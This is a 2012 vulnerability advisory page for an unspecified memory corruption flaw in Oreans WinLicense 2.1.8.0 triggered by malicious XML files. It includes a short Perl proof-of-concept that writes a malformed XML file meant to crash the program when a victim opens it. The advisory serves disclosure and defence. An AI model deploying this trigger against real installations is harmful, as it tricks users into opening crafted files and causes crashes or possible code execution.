Oreans WinLicense 2.1.8.0 Memory Corruption

2012.03.21
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/perl # # # Oreans WinLicense v2.1.8.0 XML File Handling Unspecified Memory Corruption # # # Vendor: Oreans Technologies # Product web page: http://www.oreans.com # Affected version: 2.1.8.0 (32/64bit) # # Summary: WinLicense combines the same protection-level as Themida with the # power of advanced license control, offering the most powerful and flexible # technology that allows developers to securely distribute trial and registered # versions of their applications. # # Desc: WinLicense is prone to an unspecified memory corruption vulnerability. # An attacker can exploit this issue by tricking a victim into opening a malicious # XML file to execute arbitrary code and to cause denial-of-service conditions. # # Tested on: Microsoft Windows XP Professional SP3 (EN) (32bit) # Microsoft Windows 7 Ultimate SP1 (EN) (64bit) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2012-5080 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5080.php # # # 20.03.2012 # # use strict; my $file = "zsl.xml"; my $hit = "Joxy-\\x\\-Poxy"; print "\n\n[*] Creating $file file...\n"; open ZSL, ">./$file" || die "\nCan't open $file: $!"; print ZSL $hit; print "\n[.] File successfully mounted!\n\n"; close ZSL;


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top